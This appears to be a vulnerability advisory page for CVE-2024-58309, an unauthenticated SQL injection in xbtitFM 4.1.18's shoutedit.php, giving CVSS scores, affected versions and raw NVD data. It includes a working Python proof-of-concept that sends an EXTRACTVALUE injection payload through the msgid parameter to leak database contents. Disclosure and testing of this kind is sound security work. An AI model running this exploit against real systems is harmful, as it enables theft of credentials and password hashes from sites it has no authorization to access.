Security Vulnerability Report
CVE-2024-58309 CVSS 9.8 CRITICAL

CVE-2024-58309

Published: 2025-12-11 22:15:52
Last Modified: 2025-12-30 19:50:51

Description

xbtitFM 4.1.18 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries by injecting malicious SQL code through the msgid parameter. Attackers can send crafted requests to /shoutedit.php with EXTRACTVALUE functions to extract database names, user credentials, and password hashes from the underlying database.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector (v3.1, Primary)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Note: the raw record below also carries a Secondary CVSS 4.0 assessment scoring 8.7 (HIGH) with privileges required set to Low (PR:L), so the two scorings disagree on whether authentication is needed; the Primary v3.1 vector and the description both treat the issue as unauthenticated.

Configurations (Affected Products)

cpe:2.3:a:xbtitfm:xbtitfm:4.1.18:*:*:*:*:*:*:* - VULNERABLE
xbtitFM 4.1.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import argparse def exploit_sql_injection(target_url, payload): """ CVE-2024-58309 SQL Injection PoC for xbtitFM 4.1.18 Target: shoutedit.php msgid parameter """ # Target endpoint url = f"{target_url}/shoutedit.php" # SQL injection payload using EXTRACTVALUE # This payload extracts the database version data = { 'msgid': payload, 'action': 'edit' } try: # Send POST request without authentication response = requests.post(url, data=data, timeout=10) # Check for SQL error messages containing extracted data if 'XPATH' in response.text or 'EXTRACTVALUE' in response.text: print(f"[+] Injection successful!") print(f"[+] Response excerpt: {response.text[:500]}") else: print(f"[-] No obvious SQL injection response") print(f"[-] Status code: {response.status_code}") except requests.RequestException as e: print(f"[-] Request failed: {e}") # Example payloads if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2024-58309 SQL Injection PoC') parser.add_argument('--url', required=True, help='Target base URL (e.g., http://target.com)') parser.add_argument('--payload', default="1' AND EXTRACTVALUE(0,CONCAT(0x7e,version()))-- -", help='SQL injection payload') args = parser.parse_args() print(f"[*] Exploiting CVE-2024-58309 on {args.url}") exploit_sql_injection(args.url, args.payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58309", "sourceIdentifier": "[email protected]", "published": "2025-12-11T22:15:52.487", "lastModified": "2025-12-30T19:50:50.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "xbtitFM 4.1.18 contains an unauthenticated SQL injection vulnerability that allows remote attackers to manipulate database queries by injecting malicious SQL code through the msgid parameter. Attackers can send crafted requests to /shoutedit.php with EXTRACTVALUE functions to extract database names, user credentials, and password hashes from the underlying database."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", 
"Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xbtitfm:xbtitfm:4.1.18:*:*:*:*:*:*:*", "matchCriteriaId": "B8A361AE-CCCA-460B-98A8-E2E39DA52BAD"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51909", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/xbtitfm-unauthenticated-sql-injection-in-shouteditphp", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://xbtitfm.eu", "source": "[email protected]", "tags": ["Product"]}]}}